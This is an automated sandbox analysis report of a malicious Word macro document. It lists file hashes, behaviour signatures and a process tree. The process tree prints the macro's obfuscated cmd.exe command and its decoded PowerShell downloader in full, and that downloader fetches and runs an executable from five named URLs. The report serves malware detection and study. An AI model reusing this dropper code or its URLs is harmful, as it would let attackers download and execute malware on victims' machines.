Overview

overview

10

Static

static

8

97b8c37e8d...18.doc

windows7-x64

10

97b8c37e8d...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    05/06/2024, 09:19

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    97b8c37e8df6ea660fbed08c06ad62f4_JaffaCakes118.doc

  • Size

    80KB

  • MD5

    97b8c37e8df6ea660fbed08c06ad62f4

  • SHA1

    2744eb4b32281116c7f0837b4a3c965d0139dfa3

  • SHA256

    2f3c0251d9c980c8439b488e529b0450c5ef5526442ba3fb332258ac9132858b

  • SHA512

    6d017bf5d8a188cd849786d648eac335d86f7dbc6061edd33652139c25b9ef8f18162311dd069524f84a46a042bf884b4a418fa9579fe8fe38efc31f2746e6c1

  • SSDEEP

    1536:Ru4r7ljmW9/bvFM+a9oDU3zp78KlyPh9shU3:Ru4nl/bvFQpaPh9shU3

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\97b8c37e8df6ea660fbed08c06ad62f4_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2152
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2712
      • \??\c:\windows\SysWOW64\cmd.exe
        c:\EdRqXalw\hijOzYuh\fUFKSzSIsjw\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set YWNu=nuzzKDHTpiVltARbUFAIYHcUZTbLJdTZoAATwIRg/mMq,)8vXeWGB0;+Sy\.kN=$}:r(5{Qjfh-@2 asOxE4C'P&&for %h in (63;71;21;43;62;85;11;47;86;85;54;63;71;48;1;62;0;49;36;74;32;26;71;49;22;12;77;61;49;12;59;50;49;26;84;11;9;49;0;12;54;63;73;84;8;62;85;73;12;12;8;65;40;40;26;66;9;29;39;49;47;49;0;12;1;66;49;79;11;11;22;59;22;32;41;40;4;70;17;26;83;86;82;75;73;12;12;8;65;40;40;39;66;49;49;0;8;11;78;79;12;9;22;59;22;32;41;40;60;50;48;4;5;43;79;75;73;12;12;8;65;40;40;39;73;32;1;11;78;79;73;59;22;32;41;40;21;83;52;49;21;31;11;86;75;73;12;12;8;65;40;40;26;78;29;3;49;0;78;59;22;32;41;40;34;34;84;11;38;27;28;84;51;28;75;73;12;12;8;79;65;40;40;36;36;36;59;47;29;47;11;1;39;12;59;32;66;39;40;61;11;68;78;23;50;81;3;52;85;59;56;8;11;9;12;67;85;75;85;45;54;63;38;52;29;62;85;56;78;79;85;54;63;29;71;80;77;62;77;85;76;68;53;85;54;63;32;11;78;62;85;60;3;86;85;54;63;0;0;42;62;63;49;0;47;65;12;49;41;8;55;85;58;85;55;63;29;71;80;55;85;59;49;81;49;85;54;72;32;66;49;78;22;73;67;63;52;9;4;77;9;0;77;63;73;84;8;45;69;12;66;57;69;63;71;48;1;59;5;32;36;0;11;32;78;29;17;9;11;49;67;63;52;9;4;44;77;63;0;0;42;45;54;63;17;71;60;62;85;36;26;79;85;54;37;72;77;67;67;51;49;12;74;37;12;49;41;77;63;0;0;42;45;59;11;49;0;39;12;73;77;74;39;49;77;46;53;53;53;53;45;77;69;37;0;47;32;60;49;74;37;12;49;41;77;63;0;0;42;54;63;72;50;22;62;85;36;0;41;85;54;26;66;49;78;60;54;64;64;22;78;12;22;73;69;64;64;63;38;0;34;62;85;3;36;42;85;54;93)do set EXpk=!EXpk!!YWNu:~%h,1!&&if %h geq 93 echo !EXpk:*EXpk!=!|FOR /F "delims=.M7GJ6 tokens=2" %P IN ('ftype^^^|findstr hellM')DO %P -"
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2680
        • C:\Windows\SysWOW64\cmd.exe
          CmD /V:O/C"set YWNu=nuzzKDHTpiVltARbUFAIYHcUZTbLJdTZoAATwIRg/mMq,)8vXeWGB0;+Sy\.kN=$}:r(5{Qjfh-@2 asOxE4C'P&&for %h in (63;71;21;43;62;85;11;47;86;85;54;63;71;48;1;62;0;49;36;74;32;26;71;49;22;12;77;61;49;12;59;50;49;26;84;11;9;49;0;12;54;63;73;84;8;62;85;73;12;12;8;65;40;40;26;66;9;29;39;49;47;49;0;12;1;66;49;79;11;11;22;59;22;32;41;40;4;70;17;26;83;86;82;75;73;12;12;8;65;40;40;39;66;49;49;0;8;11;78;79;12;9;22;59;22;32;41;40;60;50;48;4;5;43;79;75;73;12;12;8;65;40;40;39;73;32;1;11;78;79;73;59;22;32;41;40;21;83;52;49;21;31;11;86;75;73;12;12;8;65;40;40;26;78;29;3;49;0;78;59;22;32;41;40;34;34;84;11;38;27;28;84;51;28;75;73;12;12;8;79;65;40;40;36;36;36;59;47;29;47;11;1;39;12;59;32;66;39;40;61;11;68;78;23;50;81;3;52;85;59;56;8;11;9;12;67;85;75;85;45;54;63;38;52;29;62;85;56;78;79;85;54;63;29;71;80;77;62;77;85;76;68;53;85;54;63;32;11;78;62;85;60;3;86;85;54;63;0;0;42;62;63;49;0;47;65;12;49;41;8;55;85;58;85;55;63;29;71;80;55;85;59;49;81;49;85;54;72;32;66;49;78;22;73;67;63;52;9;4;77;9;0;77;63;73;84;8;45;69;12;66;57;69;63;71;48;1;59;5;32;36;0;11;32;78;29;17;9;11;49;67;63;52;9;4;44;77;63;0;0;42;45;54;63;17;71;60;62;85;36;26;79;85;54;37;72;77;67;67;51;49;12;74;37;12;49;41;77;63;0;0;42;45;59;11;49;0;39;12;73;77;74;39;49;77;46;53;53;53;53;45;77;69;37;0;47;32;60;49;74;37;12;49;41;77;63;0;0;42;54;63;72;50;22;62;85;36;0;41;85;54;26;66;49;78;60;54;64;64;22;78;12;22;73;69;64;64;63;38;0;34;62;85;3;36;42;85;54;93)do set EXpk=!EXpk!!YWNu:~%h,1!&&if %h geq 93 echo !EXpk:*EXpk!=!|FOR /F "delims=.M7GJ6 tokens=2" %P IN ('ftype^^^|findstr hellM')DO %P -"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2872
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo $jHq='lvP';$jXu=new-object Net.WebClient;$hCp='http://bridgeventuresllc.com/KQFb4PE@http://greenplastic.com/kWXKDqs@http://ghoulash.com/H4BeHZlP@http://badzena.com/AAClRLJCGJ@https://www.vdvlugt.org/Nl5aUWxzB'.Split('@');$RBd='Sas';$djO = '250';$ola='kzP';$nnM=$env:temp+'\'+$djO+'.exe';foreach($BiK in $hCp){try{$jXu.DownloadFile($BiK, $nnM);$Fjk='wbs';If ((Get-Item $nnM).length -ge 80000) {Invoke-Item $nnM;$fWc='wnm';break;}}catch{}}$RnA='zwM';"
            4⤵
              PID:1812
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=.M7GJ6 tokens=2" %P IN ('ftype^|findstr hellM') DO %P -"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2980
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ftype|findstr hellM
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1700
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" ftype"
                  6⤵
                    PID:1856
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr hellM
                    6⤵
                      PID:2020
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    PowerShell -
                    5⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1424

          Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
                  Filesize

                  20KB

                  MD5

                  d336c2cfb7b2cc0e37e7400fe4ba71f3

                  SHA1

                  43618e4b199950d774cb50d80caa86a102d841a9

                  SHA256

                  7c2106a24161104ba0dc67b4334274387915470ad9b2b5679ae8f1eeb90ce6c3

                  SHA512

                  480ff7274c7ffdc95db704f26a4de2a799fbe46a542f4abb9fcb49ff120b966eecf4d6f4a1b4783e4d46b0f50059fe9cb573c2bfa03c1fbe1e9582e61fa05143

                  Download Submit

                • memory/2152-9-0x00000000003B0000-0x00000000004B0000-memory.dmp

                  Filesize

                  1024KB

                  Download

                • memory/2152-2-0x0000000070B5D000-0x0000000070B68000-memory.dmp

                  Filesize

                  44KB

                  Download

                • memory/2152-6-0x00000000003B0000-0x00000000004B0000-memory.dmp

                  Filesize

                  1024KB

                  Download

                • memory/2152-10-0x00000000003B0000-0x00000000004B0000-memory.dmp

                  Filesize

                  1024KB

                  Download

                • memory/2152-11-0x00000000003B0000-0x00000000004B0000-memory.dmp

                  Filesize

                  1024KB

                  Download

                • memory/2152-0-0x000000002F3F1000-0x000000002F3F2000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/2152-7-0x00000000003B0000-0x00000000004B0000-memory.dmp

                  Filesize

                  1024KB

                  Download

                • memory/2152-22-0x0000000070B5D000-0x0000000070B68000-memory.dmp

                  Filesize

                  44KB

                  Download

                • memory/2152-23-0x00000000003B0000-0x00000000004B0000-memory.dmp

                  Filesize

                  1024KB

                  Download

                • memory/2152-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

                  Filesize

                  64KB

                  Download

                • memory/2152-38-0x000000005FFF0000-0x0000000060000000-memory.dmp

                  Filesize

                  64KB

                  Download

                • memory/2152-39-0x0000000070B5D000-0x0000000070B68000-memory.dmp

                  Filesize

                  44KB

                  Download